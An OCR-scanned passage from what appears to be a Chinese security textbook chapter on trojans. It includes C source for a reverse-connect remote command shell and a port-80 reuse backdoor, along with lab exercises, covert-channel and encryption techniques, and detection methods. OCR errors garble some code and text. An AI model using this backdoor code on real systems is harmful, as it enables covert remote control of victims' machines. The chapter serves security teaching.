return; 
} 
agdr in.sin family=AF INET7 
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adqr in.sin port= htons (80)7 // 反 向 连接 的 远 端 主机 端口 
agdr in.sin addr.S_ un.S_addr=inet addr ("127.0.0.1"); // 远 端 IP 
if((sock= socket (AF_INET,SOCK_ STREAM, IPPROTO TCP))== INVALID SOCKET) 
{ 

Printf ("Socket failed.Error:d\n",WSAGetLastError ()); 

return; 
} 
if (WSAConnect (sock, (struct sockaddr * ) gagdr in, sizeof (addr_in),NULL,NULL,NULL,NULL) 
==SOCKET ERROR) // 连 接客 户主 机 
{ 

Printf ("Connect failed.Error:d",WSAGetLastError ()); 

return; 
} 
if(send (sock,messages, strlen (messages),0)==SOCKET ERROR) 

// 发 送 测试 信息 


Printf ("Send failed.Error:d\n",WSAGetLastError ()) 7 


return; 


char buffer [2048]= {0}; // 管 道 输出 的 数据 
for (char cmdline [270]; ;memset (cmdl ine, 0, sizeof (cmdline))){ 
SECURITY_ATTRIBUTES sa; // 创 建 匿名 管道 用 于 取得 cma 的 命令 输出 
HANDLE hRead, hWrite; 
sa.nLength= sizeof (SECURITY ATTRIBUTES); 
sa.lpSecurityDescriptor=NULL; 
sa.bInheritHandle= TRUE; 
if(!CreatePipe (&hRead, ghWrite, &sa, 0)) 
{ 
printf ("Error On CreatePipe ()"); 
return; 
} 
STARTUPINFO si; 
PROCESS_INFORMATION Pi7 
si.cb= sizeof (STARTUPINFO); 
GetStartupInfo(&si); 
si.hSstdError=hWrite; 
si.hStdoutput=hWrite; 
Si.wShowWindow= SW_HIDE; 
Si.dwFlags= STARTF USESHOWWINDOW | STARTF USESTDHANDLES; 
GetSystemDirectory (cmdline,MAX PATH+ 1); 
strcat (cmdline,"\\cmd.exe /c"); 
int len= recv (sock, buf1,1024, NULL); 
if(len== SOCKET ERROR)exit(0)M 如 果 客 户 端 断 开 连接 , 则 自动 退出 程序 
if(len<=1){send(sock, "error\n",sizeof ("error\n"),0);continue;} 
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strncat (cmdlinerbufl, strlen (bd 拖 痢 念 参数 复制 到 cmdline 
if(!CreateProcess (NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, gpi)) 
‘ 

send (sock, "Error command\n", sizeof ("Error command\n") ,0); 

continue; 
} 
CloseHandle (hWrite); 
// 循 环 读 取 管 道中 数据 并 发 送 , 直 到 管道 中 没有 数据 为 止 
for (DWORD bytesRead;ReadFile (hRead, buffer, 2048, gbytesRead, NULL) ;memset (buffer, 0,2048)) 
{ 

send (sock, buffer, strlen (buffer) ,0); 
} //for 


} //for 
} //main() 


(2) 分 析 以 上 程序 ,程序 如 何 处 理 反 向 连接 的 端口 ? 

(3) 编写 受 控 端的 连接 程序 ,必要 时 可 更 改 控制 端 程序 。 

(4) 往 受 控 端 发 送 属于 木马 的 数据 包 ,进行 实验 验证 。 实 验 时 ,防火 墙 有 什么 反应 ? 

(5) 在 验证 时 ,用 Wireshark 捕获 往来 的 数据 包 , 深 入 分 析 实 验 过 程 。 

@ 受 控 端 与 控制 端 采用 什么 连接 协议 ? 

@ 防火 墙 如 何 处 理 受 控 端 与 控制 端的 数据 ? 

@ 让 受 控 端 执行 一 个 命令 行 命令 (例如 目录 查看 dir 命令 ) ,分 析 受 控 端 与 控制 端的 交 
互 过 程 。 

【实验 思考 】 

(1) 如 何 发 现 本 实验 类 型 的 木马 ? 

(2) 如 何 清除 .防御 本 实验 类 型 的 木马 ? 

2. 端口 复 用 技术 

木马 服务 端 和 客户 端 连接 时 需要 通过 端口 进行 ,如 果 使 用 新 的 端口 , 则 降低 了 木马 的 隐 
藏 性 ,因为 易 被 端口 扫描 工具 发 现 。 

如 果木 马 程序 不 打开 新 的 端口 ,而 是 利用 系统 已 开放 的 端口 进行 通信 ,显然 可 以 提高 其 
隐藏 性 ,并 且 可 以 避 开 防火 墙 对 端口 的 监测 。 这 就 是 所 谓 的 端口 复 用 技术 (也 称 端口 劫持 ) 。 
由 于 没有 打开 新 的 端口 ,只 对 信息 进行 字符 匹配 ,没有 权限 之 分 ,对 网 络 数据 的 传输 性 能 几 
乎 不 受 影响 ,也 不 会 引起 用 户 对 已 打开 端口 的 怀疑 。 对 于 基于 TCP/UDP 协议 的 网 络 程 
序 ,在 通信 时 必须 把 本 地 IP 和 某 个 端口 号 绑 定 到 一 个 套 接 字 上 进行 端口 的 隐藏 。 当 系统 
收 到 一 个 数据 包 时 ,如 果木 马 复 用 了 该 端口 ,由 木马 在 客户 端 发 送 数据 给 端口 前 截获 这 个 数 
据 , 由 判断 模块 通过 特定 的 包 格 式 ( 特 征 值 ) 判 断 是 不 是 木马 控制 端 发 来 的 数据 ,若是 则 交 给 
木马 程序 处 理 , 否 则 将 其 转交 给 端口 程序 ,该 过 程 如 图 4-9 所 示 。 
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无 端口 复 用 时 


非 木马 数据 | 应 用 程序 


数据 包 归属 
数据 包 目标 系统 | 表亲 “| 判 电 模 块 
复 用 时 


是 木马 数据 木马 程序 


图 4-9 端口 复 用 原理 


实验 4-2 端口 复 用 测试 实验 

【实验 目的 】 

(1) 理解 “端口 复 用 ”技术 。 

(2) 理解 木马 客户 端 与 服务 端的 交互 模式 。 

【实验 环境 】 

测试 可 选择 实体 机 或 在 虚拟 机 里 进行 ,操作 系统 为 Windows 平台。 

【实验 原理 】 

端口 复 用 实际 上 是 在 服务 器 安装 一 个 中 间 程 序 ,在 客户 端 发 送 数据 给 端口 前 截获 这 个 
数据 ,然后 判断 这 是 不 是 黑客 发 来 的 数据 ,如 果 是 ,把 它 发 给 后 门 程序 ;如 果 不 是 , 则 转发 给 
端口 程序 ,返回 信息 再 发 给 客户 端 。 所 以 中 间 程 序 既是 一 个 服务 端 程序 (监听 连接 ), 也 是 一 
个 客户 端 程序 (发 送 给 端口 程序 )。 要 使 用 复 用 端口 ,中 间 程 序 的 监听 使 用 Socket 的 
setsockopt() 函 数 设置 。 

【实验 过 程 】 

(1) 根据 端口 复 用 原理 , 先 编写 中 间 程 序 ( 即 服务 端 程序 ) 。 

实际 上 ,应 用 程序 或 者 进程 所 需要 的 IP 和 端口 用 的 只 是 回环 地 址 127. 0. 0. 1 和 其 所 需 
要 的 端口 ,端口 复 用 技术 中 最 重要 的 一 个 函数 是 setsockopt(), 由 它 实现 端口 的 重 绑 定 。 函 
数 原型 如 下 : 


int PASCAL FRR setsockopt ( 
SOCKET s, 
int level, 
int optname, 
const char FAR* optval, 
int optlen); 


其 中 : 

s: 标识 一 个 套 接口 的 描述 字 。 

level: 选项 定义 的 层次 ;目前 仅 支 持 SOL_SOCKET 和 IPPROTO_TCP 层次 。 

optname: 需 设置 的 选项 。 

optval: 指针 ,指向 存放 选项 值 的 缓冲 区 。 

optlen : optval 缓冲 区 的 长 度 。 

setsockopt( ) 函数 用 于 任意 类 型 .任意 状态 套 接 口 的 设置 选项 值 。 若 无 错误 发 生 ， 
setsockopt( ) 返回 0, 否则 返回 SOCKET _ ERROR 错误 ,应 用 程序 可 通过 
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WSAGetLastError() 获 取 相 应 的 错误 代码 。 

基本 实现 过 程 是 后 门 程序 对 80 端口 进行 监听 ,接收 到 数据 后 对 数据 进行 分 析 , 如 果 是 
自己 的 数据 包 , 则 后 门 程序 自己 进行 处 理 ; 如 果 不 是 , 则 把 数据 转发 到 127. 0. 0. 1 地 址 的 80 
端口 上 供 本 地 Web 服务 使 用 。 下 面 的 代码 运行 在 木马 受 控 端 。 


#include < stdio.h> 


#include <WINSOCK2.H> // 加 入 socket 的 头 文件 与 链接 库 
#pragma comment (lib, "Ws2 32.1ib") // 端 口 复 用 程序 包含 监听 与 连接 两 种 功能 的 Socket 
void proc (LPVOID d) 7 // 工 作 线程 
int main (int argc,char * argv[]) 
{ // 初 始 化 Socket 参数 
WSADATA wsaData; 
WSAStartup (MAKEWORD (2, 2), &wsaData); //Socket 版 本 


SOCKADDR_IN a,b; 
// 一 个 是 用 于 外 部 监听 的 地 址 , 另 一 个 是 接收 到 accept 时 用 于 处 理 接收 的 结构 
a.sin family=AF INET; 
a.sin addr.s addr= inet addr(argv[1]); 
a.sin port=htons (80); 


SOCKET cy //c 是 用 于 监听 的 Socket 
c= socket (AF_INET, SOCK_STREAM, ITPPROTO_TCP) ; 
bool 1=TRUE; 
setsockopt (c, SOL_SOCKET, SO_REUSEADDR, (char * )&l1,sizeof(1)); 
// 重 用 端口 设置 
bind(c, (sockadqr * ) &a, sizeof (a)); // 绑 定 
listen (c,100); // 监 听 
while(1) 
int x 


x= sizeof (b); 
SOCKET d=accept (c, (sockaddr * ) &b, &x); //d 是 当 接 收 到 连接 时 用 的 Socket 
// 监 听 的 Socket 只 有 一 个 而 处 理 接 收 到 
// 的 Socket 可 有 多 个 ,个 数 由 连接 数 决定 
CreateThread( // 开 始 处 理 线程 
NULL, 0, (LPTHREAD START_ROUTINE)Proc, (LEVOID)d, 0,0); 
} 
Closesocket (c); 
return 0; 
} 
void proc (LPVOID d) 
{ 
SOCKADDR_IN sa; // 用 于 连接 Web 80 端口 的 Socket 的 结构 
// (这 个 相当 于 客户 端 程序 ,向 外 服务 端 连 接 ) 
// 向 外 连接 socket 只 有 一 个 
sa.sin family=AF_INET; 
sa.sin addr.s addr=inet adqr ("127.0.0.1"); 
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sa.sin port=htons (80) 7 
SOCKET web= socket (AF_INET,SOCK_STREAM, IPPROTO TCP); 


connect (web, (sockaddr * ) &sa, sizeof (sa)); // 用 此 线程 程序 连接 Web 
char buf [4096]; 
SOCKET ss= (SOCKET)d; // 把 传 进来 的 处 理 连接 的 socket 赋 给 ss 
while (1) 
{ 
int n=recv (ss,buf, 4096, 0); // 从 外 部 连接 a( 即 ss) 收 到 数据 
if(n==0) // 没 有 数据 
break; 


if(n>0 && buf[0]=="'y"') 
{ 


send(ss, "hello!,my hacker master!",25,0); 


// 是 攻击 者 的 数据 ,由 木马 程序 处 理 
} 
else 
{ 
send (web, buf,n,0); // 不 是 攻击 者 的 数据 ,把 信息 发 给 Web 服务 
// 程 序 (转发 到 127.0.0.1, 即 服务 端 ) 
n=recv (web, buf, 4096, 0); // 接 收 到 正常 服务 程序 返回 的 信息 
if (n==0) // 如 果 正 常服 务 器 程序 没有 返回 信息 , 则 退出 
break; 
else 
send(ss,buf,n,0); // 和 否则 把 服务 器 正常 信息 发 给 客户 端 (相当 


// 于 客户 端 是 没有 恶意 行为 的 用 户 ) 
} 
} 


Closesocket (ss); 

} 

(2) 分 析 以 上 程序 ,程序 认为 属于 木马 的 数据 包 是 什么 特征 值 ? 

(3) 请 编写 客户 端的 连接 程序 (必要 时 可 更 改 服务 端 程序 ) 。 

(4) 构造 属于 /不 属于 木马 的 数据 包 ,发 送 给 受 控 端 ( 即 服务 端 ) ,进行 实验 测试 。 实 验 
时 ,防火 墙 有 什么 反应 ? 

(5) 在 测试 时 ,用 Wireshark 捕获 往来 的 数据 包 , 深 入 分 析 实 验 过 程 。 

中 Wireshark 认为 受 控 端 与 控制 端的 数据 包 是 什么 协议 ? 

G@ 分 析 受 控 端 与 控制 端的 交互 过 程 。 

@ 对 于 不 属于 木马 的 数据 , 受 控 端 如 何 处 理 ? 

【实验 思考 】 

(1) 根据 实验 ,讨论 木马 利用 端口 复 用 技术 可 以 进行 哪些 攻击 ? 

(2) 端口 复 用 技术 与 Hook 技术 对 木马 来 说 有 什么 异同 ? 

3. 隐蔽 信道 技术 

传统 木马 信道 技术 借助 于 端口 规则 和 进程 规则 躲避 防火 墙 ,难以 保证 木马 信道 的 可 靠 
性 和 稳定 性 。 隐 项 信道 是 指 利用 任何 非常 规 通信 手段 在 网 络 中 传输 信息 的 通道 。 木 马 隐 项 
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信道 的 核心 是 突破 主机 防火 墙 的 拦截 。 一 种 实现 方法 是 利用 TCP/IP 协议 头 中 定义 的 域 ， 
这 些 “ 域 ”往往 在 传输 数据 时 必须 强制 填充 ,所 以 可 以 在 Option 域 填充 木马 数据 ; 另 一 种 方 
法 是 使 用 特殊 协议 传递 数据 ,比如 HTTP、ICMP。HTTP 是 WWW 服务 的 标准 协议 ,防火 
墙 一 般 只 检查 HTTP 头 , 对 正文 不 做 处 理 。 木 马 可 以 把 数据 写 到 正文 中 传递 ,从 而 绕 过 防 
火 墙 的 检测 。ICMP 是 IP 协议 的 附属 协议 ,用 来 传递 差错 报 文 及 其 他 消息 报 文 。 木 马 程序 
伪装 成 一 个 ping 程序 ,把 数据 隐藏 在 ICMP 报 文 的 选项 数据 字段 进行 传送 : 服务 端 发 出 的 
数据 伪装 成 ICMP_ECHO, 客 户 端 发 出 的 数据 伪装 成 ICMP_ECHOREPLY。 这 样 系统 就 
会 将 ICMP_ECHOREPLY 的 监听 处 理 任务 交 给 木马 程序 ,一旦 特定 的 标志 响应 包 出 现 , 木 
马 就 能 进行 命令 接收 和 处 理 。 这 样 实现 的 隐蔽 信道 摆脱 了 端口 的 限制 (因为 ICMP 报 文 由 
系统 内 核 或 进程 直接 处 理 而 不 通过 端口 ) ,达到 了 更 好 的 隐藏 效果 。 

4. 传输 加 密 技术 

由 于 木马 传输 数据 的 截获 手段 正在 不 断 地 发 展 ,木马 服务 端 和 客户 端 通信 传输 的 数据 
如 果 是 明文 , 极 易 被 协议 分 析 软 件 和 嗅 探 软 件 ( 如 Wireshark) 获 取信 息 内 容 , 并 暴露 客户 端 
的 网 络 位 置 。 为 了 避免 这 个 问题 ,一 些 木 马 使 用 了 加 密 算 法 对 传输 内 容 进行 加 密 , 使 之 不 被 
对 方 或 第 三 方 截获 后 轻易 地 破解 出 明文 ,更 不 能 通过 分 析 网 络 数据 来 判断 木马 的 存在 ,对 木 
马 服务 端 和 客户 端 都 起 到 了 很 好 的 保护 作用 。 

木马 数据 采用 何 种 加 密 算法 极为 重要 。 对 称 密码 体制 的 优点 是 具有 很 高 的 保密 强度 ， 
加 解密 速度 较 快 ,可 以 经 受 较 高 级 破译 力量 的 分 析 和 攻击 ,但 其 密 钥 必 须 通 过 安全 可 靠 的 途 
径 传递 。 而 非 对 称 密码 体制 可 以 适应 开放 性 的 使 用 环境 , 密 钥 管理 问题 相对 简单 ,可 以 方便 
安全 地 实现 数字 签名 和 验证 ,但 其 加 解密 速度 较 慢 ,不 适用 于 大 量 数据 的 加 解密 。 

在 算法 的 设计 上 既 要 考虑 加 密 算法 时 效 性 ,还 要 考虑 算法 对 木马 系统 所 带 来 的 负面 影 
响 。 如 果 过 于 简单 则 易于 破解 ;也 不 能 过 于 复杂 ,加 解密 的 过 程 不 能 占用 太 长 的 时 间 和 太 多 
的 系统 资源 。 一 般 木 马 数据 加 密 传 输 方案 是 用 非 对 称 密码 体制 (如 RSA) 进 行 数据 加 密 密 
钥 的 传递 ,而 用 对 称 密码 体制 (如 DES) 即 数据 加 密 密 钥 来 进行 实际 传输 的 数据 的 加 解密 。 
实际 设计 时 ,可 以 使 用 RSA 算法 加 密 DES 的 加 密 密 钥 ,然后 通过 网 络 传递 经 加 密 以 后 的 密 
文 , 这 样 可 有 效 地 提高 系统 数据 传输 的 安全 性 。 

一 个 木马 加 密 方 案 如 图 4-10 所 示 。 当 受 控 端 连接 到 控制 端 后 ,控制 端 利用 RSA 算法 
产生 加 密 公 钥 R1 与 解密 私 钥 R2, 将 R1 传输 给 受 控 端 。 受 控 端 接收 到 加 密 公 钥 R1 后 , 随 
机 生成 数据 加 解密 密 钥 KEY ,利用 加 密 密 钥 R1 加 密 后 传输 给 控制 端 。 控 制 端 利用 解密 私 
钥 R2 将 数据 解密 ,得 到 数据 加 解密 密 钥 KEY。 这 样 就 完成 了 控制 端 与 受 控 端 交换 数据 加 
解密 密 钥 KEY 的 过 程 ,以 后 通信 时 ,就 可 以 利用 KEY 进行 数据 加 解密 。 


4.2.7 木马 检测 与 清除 


木马 检测 技术 可 以 分 为 两 类 : 基于 主机 的 木马 检测 技术 和 基于 网 络 的 木马 检测 技术 。 
基于 主机 的 木马 检测 技术 主要 在 单个 主机 上 ,通过 主机 上 的 一 些 特征 对 木马 等 恶意 软件 进 
行 检测 。 基 于 网 络 的 木马 检测 技术 主要 在 网 络 层 ,通过 对 网 络 流量 特征 的 分 析 , 对 木马 攻 
击 、 僵 尸 网 络 等 进行 检测 和 防范 。 

1. 主机 的 木马 检测 技术 

主机 的 木马 检测 技术 主要 有 以 下 3 种 方式 。 
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受 控 端 连接 控制 端 
| 一 | RSA 算 法 加 密 公 钥 R1 |- | = | 用 解密 私 铀 R2 

-| 解密 得 到 KEY 
| 一 | 用 R1 加 密 随机 数 KEY | 一 | 所 


控 
交换 密 钥 KEY 加 
主 
| 
DES 算 法 [一 ”DES 算法 
EE 
数据 加 密 传 输 | 
1 


图 4-10 木马 数据 加 解密 流程 


也 村 册 普 工 味 


1) 特征 码 检测 

特征 码 是 某 个 已 知 恶意 程序 特有 的 一 串 二 进 制 信息 , 它 是 该 恶意 程序 的 唯一 标识 ,特征 
码 一 般 不 大 于 64B。 特 征 码 检测 是 目前 最 成 熟 `. 可 靠 和 有 效 的 恶意 软件 检测 技术 , 它 具 有 误 
报 率 低 、 检 测 效 率 高 检测 准确 率 高 .稳定 性 高 的 特点 ,同时 也 是 应 用 最 广泛 的 检测 技术 。 

这 种 检测 技术 需要 事先 知道 木马 文件 的 特征 值 , 并 将 特征 值 存 进 检测 特征 库 中 , 当 对 恶 
意 软 件 进行 检测 时 , 需 将 其 特征 码 与 特征 库 的 特征 码 进行 对 比 来 实现 检测 。 但 特征 码 的 搜 
集 一 般 都 存在 滞后 性 ,因为 首先 要 对 捕获 到 的 木马 样本 程序 进行 分 析 , 对 代表 木马 的 核心 代 
码 进行 定位 ,并 需要 对 这 段 代码 进行 反复 的 测试 验证 ,只 有 确保 这 段 代码 可 以 将 该 木马 程序 
与 其 他 合法 程序 区 别 时 ,才能 确定 这 段 代码 是 特征 码 , 并 加 入 到 特征 库 中 ,并 在 以 后 的 检测 
中 不 断 地 升级 更 新 特征 码 库 。 
特征 码 检测 技术 的 缺点 是 不 能 检测 到 新 出 现 的 恶意 软件 ,对 一 些 已 知 恶 意 软件 的 变种 
也 难以 检测 。 

2) 这 检测 与 逆向 分 析 

加 这 是 一 般 木 马 的 通用 手段 , 既 可 以 压缩 木马 的 大 小 ,又 可 以 在 一 定 程度 上 防止 被 人 逆 
向 分 析 , 还 可 在 一 定 程度 上 做 到 对 查 杀 软 件 免疫 。 因 此 ,如 果 检 测 发 现 可 疑 文件 被 加 过 ,再 
结合 公司 信息 等 其 他 一 些 信息 (微软 公司 的 系统 文件 一 般 是 不 加 壳 的 ), 即 可 初步 判断 是 否 
为 木马 了 。 

查 壳 的 主要 工具 是 PEiD。 由 于 不 同 的 过 有 其 特征 码 , 利 用 这 一 点 就 可 识别 是 被 何 种 这 
所 加 密 。PEiD 的 原理 是 利用 搜索 特征 串 来 完成 对 壳 的 识别 。 

如 果 通 过 壳 检 测 还 是 无 法 准确 判断 其 是 否 为 木马 时 ,可 以 通过 动态 调试 或 静态 反 汇 编 
来 对 文件 进行 进一步 分 析 ,通过 追踪 其 行为 和 查看 其 汇编 代码 , 即 可 分 析出 其 具体 的 功能 ， 
从 而 准确 判断 是 否 为 木马 文件 。 

动态 调试 就 是 利用 调试 器 (例如 OllyDBG 工具 ) , 单 步 跟踪 执行 软件 。OllyDBG 适合 于 
调试 Ring3 级 的 程序 ,功能 十 分 强大 。 

静态 分 析 则 是 从 反 汇 编 出 来 的 程序 清单 上 分 析 , 从 提示 信息 入 手 。 大 多 数 软件 在 设计 
时 都 采用 了 人 机 对 话 方式 ( 即 在 软件 运行 过 程 中 ,需要 由 用 户 选 择 的 地 方 ,由 软件 显示 相应 
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的 提示 信息 ,并 等 待 用 户 击 键 选择 ) 。 而 在 执行 完 某 一 段 程序 之 后 , 便 显 示 一 串 提 示 信 息 ,以 
反映 该 段 程序 运行 后 的 状态 : 正常 运行 ,出 现 错误 ,或 提示 下 一 步 操 作 的 帮助 信息 。 为 此 ， 
如 果 对 静态 反 汇 编 出 来 的 程序 清单 进行 解读 ,就 可 了 解 软件 的 编程 思路 ,以便 顺 利 破 解 。 常 
用 的 静态 分 析 工 具有 W32DASM、C32Asm 和 IDA Pro 等 。 

3) 实时 监控 检测 

实时 监控 是 指 从 多 个 不 同 的 角度 对 流入 流出 系统 的 数据 进行 过 滤 , 检 测 并 处 理 其 中 可 
能 含有 的 恶意 程序 代码 。 实 时 监控 主要 包括 文件 监控 、 内 存 监控 、 邮 件 监控 、 脚 本 监控 等 。 
当 恶 意 软 件 在 通过 更 改 系 统 文件 和 设置 注入 计算 机 时 ,这 种 检测 技术 可 以 有 效 地 检测 到 恶 
意 软件 。 查 找 木马 特定 的 文件 是 一 个 常用 的 方法 .例如 ,众所周知 “冰河 ”的 特征 文件 是 
G_Server. exe, 但 “冰河 ”的 另 一 个 特征 文件 伪装 成 Windows 的 内 核 kernl32. exe, 还 有 另 一 
个 更 隐蔽 的 文件 sysexlpr. exe。“ 冰 河 ” 之 所 以 给 文件 取 这 样 的 名 字 就 是 为 了 更 好 地 伪装 
自己 。 

实时 监控 在 反 木 马 等 恶意 软件 方面 体现 出 良好 的 实时 性 : 恶意 程序 一 旦 人 侵 系 统 , 会 
立刻 被 实时 监控 检测 到 并 被 直接 清除 ,从 而 减少 或 者 避免 恶意 程序 对 系统 造成 的 破坏 。 其 
缺点 是 只 能 检测 已 知 的 恶意 程序 ,不 能 检测 未 知 恶意 程序 。 其 主要 原因 是 实时 监控 也 是 借 
助 特征 码 进行 检测 的 。 比 如 内 存 监 控 , 就 是 检查 内 存 数据 是 否 具有 已 知 恶意 程序 的 特征 码 。 
此 外 ,由 于 实时 监控 技术 需要 实时 对 文件 系统 进行 监控 ,对 计算 机 的 系统 资源 消耗 比较 大 ， 
会 降低 计算 机 的 运行 性 能 。 

4) 启发 式 检 测 

启发 式 检测 通过 在 一 个 控制 的 环境 中 运行 可 疑 的 执行 文件 ,并 观察 系统 文件 (如 注册 
表 、 敏 感 文档 .服务 等 )、 系 统 进程 和 系统 API 函数 等 来 检测 木马 等 恶意 软件 。 

2. 基于 网 络 的 木马 检测 技术 

基于 网 络 的 木马 检测 技术 主要 通过 对 可 疑 网 络 流量 的 分 析 来 实现 对 攻击 行为 的 检测 。 
相 比 于 基于 主机 的 检测 方式 ,基于 网 络 的 恶意 流量 检测 技术 能 够 为 整个 局 域 网 提供 实时 的 
风险 感知 能 力 , 且 具备 更 低 的 部 署 成 本 和 更 大 的 保护 范围 ,该 技术 一 般 是 在 现 有 的 成 熟 的 
NIDS 技术 和 产品 上 进一步 改进 而 来 的 。 


习 题 4 
1. 阅读 RFC 1244, 理 解 木 马 的 定义 。 
2. 选择 题 。 
(1) 使 用 计算 机 时 感觉 到 操作 系统 系统 运行 速度 明显 减 慢 ,打开 任务 管理 器 后 发 现 
CPU 的 使 用 率 达 到 了 100% ,最 有 可 能 受到 的 攻击 是 ( js 
A. 特洛伊 木马 B. 拒绝 服务 C. 欺骗 D. 中 间 人 攻击 


(2) 当 收 到 认识 的 人 发 来 的 电子 邮件 并 发 现 其 中 有 意外 附件 ,应 该 ( )。 
A. 打开 附件 ,然后 将 它 保存 到 硬盘 
B. 打开 附件 ,但 是 如 果 它 有 病毒 .立即 关闭 它 

. 用 防 病毒 软件 扫描 以 后 再 打开 附件 

.直接 删除 该 邮件 


SS 人 
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(3) 下 列 病毒 出 现 的 时 间 最 晚 的 类 型 是 ( Si, 
A. 携带 特洛伊 木马 的 病毒 B. 以 网 络 钓 鱼 为 目的 的 病毒 
C. 通过 网 络 传播 的 蠕虫 病毒 D. Office 文档 携带 的 宏 病毒 
(4) 网 络 传播 型 木马 的 特征 有 很 多 ,以 下 描述 中 正确 的 是 ( js 
A. 利用 现实 生活 中 的 邮件 进行 散播 ,不 会 破坏 数据 ,但 是 会 将 硬盘 加 密 锁 死 
B. 兼备 伪装 和 传播 两 种 特征 并 结合 TCP/IP 网 络 技术 四 处 泛滥 ,同时 还 添加 了 
“后 门 ” 和 击 键 记录 等 功能 
C. 通过 伪装 成 一 个 合法 性 程序 诱骗 用 户 上 当 
D. 通过 消耗 内 存 而 引起 注意 
(5) 采用 “进程 注入 ”可 以 (  )。 
A. 隐藏 进程 B. 隐藏 网 络 端口 
C. 以 其 他 程序 的 名 义 连接 网 络 D. 以 上 都 正确 
(6) 木马 程序 一 般 是 指 潜藏 在 用 户 计算 机 中 带 有 恶意 性 质 的 ( ) ,利用 它 可 以 在 用 
户 不 知情 的 情况 下 窃取 用 户 联网 计算 机 上 的 重要 数据 信息 。 


A. 远程 控制 软件 B. 计算 机 操作 系统 

C. 木头 做 的 马 D. 类 似 于 诸葛 亮 发 明 的 木 牛 流 马 
(7) 以 下 ( ) 属 于 木马 的 特点 。 

A. 自动 运行 性 B. 隐蔽 性 

C. 能 自动 打开 特定 端口 D. 具备 自动 恢复 能 力 


(8) 以 下 描述 中 ) 不 属于 木马 的 特征 。 
A. 监控 用 户 行为 ,获取 用 户 重要 资料 
B. 发 送 QQ MSN 尾巴 ,骗取 更 多 人 访问 恶意 网 站 ,下 载 木马 
C. 盗 取 用 户 账号 ,以 达到 非法 获取 虚拟 财产 和 转移 网 上 资金 的 目的 
D. 安装 以 后 随时 自动 弹出 广告 
(9) 有 记录 在 线 / 离 线 特征 的 木马 属于 ( ) 术 可 :s 
A. 代理 B. 键盘 记录 C. 远程 访问 型 D. 程序 杀手 
3. 设计 一 个 DLL 木马 模拟 程序 ,包括 客户 端 和 服务 端 两 部 分 程序 。 先 行将 服务 端 植 
入 ,再 进行 连接 。 然 后 查看 进程 管理 器 ,分 析 其 进程 隐藏 情况 。 
4. 如 图 4-11 所 示 ,虽然 局 域 网 有 防火 墙 \.NIDS 等 防护 措施 ,但 还 是 发 现 局 域 网 里 有 
PC 受到 木马 攻击 , 试 分 析 可 能 的 木马 类 型 .并 提出 防御 建议 。 


ga—o ee 


局 域 网 


防火 墙 


图 4-11 实验 拓扑 
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5. 国外 流行 一 种 “敲诈 者 木马 ”, 通 过 邮件 夹带 附件 进行 传播 。 一 经 激活 ,Office 文档 
及 图 片 就 会 被 恶意 深度 加 密 , 要 求 用 户 在 72 小 时 内 向 指定 账户 汇 人 300 美元 ,否则 将 销毁 
解密 密 钥 。 该 木马 病毒 采用 非 对 称 的 RSA-2048 算法 加 密 , 解 密 私 钥 只 有 木马 作者 拥有 。 
木马 加 密 的 文件 非常 广泛 ,如 果 没 有 木马 作者 提供 的 私 钥 , 所 有 这 些 文件 将 全 部 作废 ,无 法 
恢复 ,危害 很 大 。 讨 论 此 种 木马 加 密 文件 的 可 能 破解 与 预防 方法 。 

6. 计算 机 病毒 测试 实验 。 

实验 目的 : 

(1) 掌握 各 种 系统 软件 工具 的 使 用 ,能 对 内 存 、 注 册 表 ,文件 中 的 数据 进行 分 析 。 

(2) 掌握 病毒 的 特征 ,能 提出 合理 的 防范 措施 。 

实验 软件 环境 : 装 有 Windows 系统 的 VMware 虚拟 机 ,其 中 安装 有 OllyDBG、 
Filemon、SReng2、RegShot、SSM、PEiD、OD 等 应 用 软件 。 在 开始 实验 之 前 ,确保 虚拟 机 内 
的 系统 纯净 ,然后 保存 虚拟 机 的 快照 。 

这 些 软件 作用 如 下 。 

OllyDBG: 动态 追踪 工具 ,将 IDA 与 SoftICE 结合 起 来 的 思想 ,Ring 3 级 调试 器 ,简单 
易 用 ,是 比较 流行 的 调试 解密 工具 。 该 软件 同时 支持 插件 扩展 功能 ,是 目前 最 强大 的 调试 
工具 。 

Filemon: 文件 系统 监视 软件 , 它 可 以 监视 应 用 程序 进行 的 文件 读 写 操作 。 它 将 所 有 与 
文件 相关 的 操作 (如 读 取 、 修 改 、 出 错 信息 等 ) 全 部 记录 下 来 以 供用 户 参 考 , 并 允许 用 户 对 记 
录 的 信息 进行 保存 、 过 滤 、 查 找 等 处 理 , 给 系统 的 维护 提供 了 极 大 的 便利 。 

SReng2: 计算 机 安全 辅助 和 系统 维护 辅助 软件 。 主 要 用 于 发 现 、 发 掘 潜在 的 系统 故障 
和 大 多 数 由 于 计算 机 病毒 造成 的 破坏 ,并 提供 一 系列 的 修改 建议 和 自动 修复 方法 。 

RegShot: 可 以 扫描 并 保存 注册 表 的 快照 ,并 对 两 次 快照 进行 自动 对 比 , 找 出 快照 间 存 
在 的 不 同 之 处 ,结果 可 以 保存 成 txt 或 者 是 html 文档 。 

SSM: 系统 监控 软件 ,通过 监视 系统 特定 的 文件 (如 注册 表 等 ) 及 应 用 程序 ,达到 保护 系 
统 安全 的 目的 ,是 一 款 对 系统 进行 全 方位 监测 的 防火 墙 工 具 。 它 不 同 于 传统 意义 上 的 防火 
墙 , 系 针 对 操作 系统 内 部 的 存 取 管 理 , 因 此 与 任何 网 络 /病毒 防火 墙 都 是 不 相 冲 突 的 。 

PEiD: 著名 的 查 过 工具 ,其 功能 强大 ,几乎 可 以 侦 测 出 所 有 的 壳 。 

OD: 反 汇 编 工具 OllyDebug( 简 称 OD) ,一 款 功 能 十 分 强大 的 动态 追踪 工具 。 

实验 需要 下 载 一 款 病毒 样本 ,安装 在 虚拟 机 上 ,利用 工具 软件 进行 分 析 。 本 实验 是 针对 
orz. exe 的 病毒 样本 的 查 杀 分 析 测 试 。 

检测 分 析 计 算 机 病毒 的 过 程 如 下 : 

(1) 了 解 orz. exe 及 其 危害 性 。 

(2) 运行 RegShot 进行 注册 表 快 照 比 较 。 

首先 ,运行 RegShot 软件 ,在 选择 日 志 输 出 路 径 后 单 击 1st shot, 即 对 纯净 系统 下 的 注 
册 表 进行 快照 。 之 后 不 要 退出 程序 , 接 下 来 运行 要 测试 的 orz. exe, 再 单 击 2st shot, 即 对 运 
行 病毒 后 的 注册 表 进 行 快 照 。 在 第 二 次 快照 完成 之 后 , 单 击 compare 便 会 在 浏览 器 中 显示 
出 注册 表 的 变化 。 请 给 出 截图 并 进行 分 析 。 

